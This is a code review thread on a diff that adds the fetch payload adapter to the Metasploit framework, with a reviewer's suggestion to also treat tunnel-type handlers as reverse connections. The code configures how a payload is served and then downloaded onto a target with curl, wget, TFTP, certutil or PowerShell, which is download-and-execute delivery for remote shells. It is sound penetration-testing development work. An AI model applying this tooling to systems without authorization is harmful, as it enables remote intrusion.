lib/msf/core/payload/adapter/fetch.rb

```diff
@@ -0,0 +1,343 @@
+module Msf::Payload::Adapter::Fetch
+
+  def initialize(*args)
+    super
+    register_options(
+      [
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ WGET CURL FTP TNFTP TFTP Certutil Psh_InvokeWebRequest }]),
+        Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
+        Msf::OptAddressLocal.new('FETCH_SRVHOST', [ true, 'Local IP to use for serving payload', "0.0.0.0"]),
+        Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
+        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces.', Rex::Text.rand_text_alpha(rand(8..12))], regex:/^[\S]*$/),
+        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', ''], regex:/^[\S]*$/)
+
+      ]
+    )
+    register_advanced_options(
+      [
+        Msf::OptAddress.new('FetchListenerBindAddress', [ false, 'The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST']),
+        Msf::OptPort.new('FetchListenerBindPort', [false, 'The port to bind to if different from FETCH_SRVPORT']),
+        Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false]),
+        Msf::OptString.new('FetchServerName', [true, 'Fetch Server Name', 'Apache'])
+      ]
+    )
+    @delete_resource = true
+    @fetch_service = nil
+    @myresources = []
+    @srvexe = ''
+    @remote_destination_win = nil
+    @remote_destination_nix = nil
+    @windows = nil
+
+  end
+
+  def check_srvhost
+    if Rex::Socket.is_ip_addr?(srvhost) && Rex::Socket.addr_atoi(srvhost) == 0
+      raise ArgumentError, 'You must set FETCH_SRVHOST to a routable IP'
+    end
+  end
+
+  def compatible?(mod)
+    if mod.type == Msf::MODULE_PAYLOAD && (mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic) && (mod.class::CachedSize >= 120_000) # echo does not have an unlimited amount of space
+      return false
+    end
+    super
+  end
+
+
+  # If no fetch URL is provided, we generate one based off the underlying payload data
+  # This is because if we use a randomly-generated URI, the URI generated by venom and
+  # Framework will not match.  This way, we can build a payload in venom and a listener
+  # in Framework, and if the underlying payload type/host/port are the same, the URI
+  # will be, too.
+  #
+  def default_srvuri
+    # If we're in framework, payload is in datastore; msfvenom has it in refname
+    payload_name = datastore['payload'] ||= refname
+    decoded_uri = payload_name.dup
+    # there may be no transport, so leave the connection string off if that's the case
+    netloc = ''
+    if module_info['ConnectionType'].upcase == 'REVERSE'
```

Comment:
For payloads like `reverse_http`, this should also check if the connection type is tunnel.

```
lib/msf/core/handler/reverse_hop_http.rb:52:  def self.general_handler_type
lib/msf/core/handler/reverse_hop_http.rb-53-    "tunnel"
--
lib/msf/core/handler/reverse_http.rb:36:  def self.general_handler_type
lib/msf/core/handler/reverse_http.rb-37-    "tunnel"
--
lib/msf/core/handler/reverse_https.rb:29:  def self.general_handler_type
lib/msf/core/handler/reverse_https.rb-30-    "tunnel"
--
lib/msf/core/handler/reverse_https_proxy.rb:28:  def self.general_handler_type
lib/msf/core/handler/reverse_https_proxy.rb-29-    "tunnel"
--
lib/msf/core/handler/reverse_ssh.rb:25:      def self.general_handler_type
lib/msf/core/handler/reverse_ssh.rb-26-        'tunnel'
```

```suggestion
    if module_info['ConnectionType'].upcase == 'REVERSE' || module_info['ConnectionType'].upcase == 'TUNNEL'
```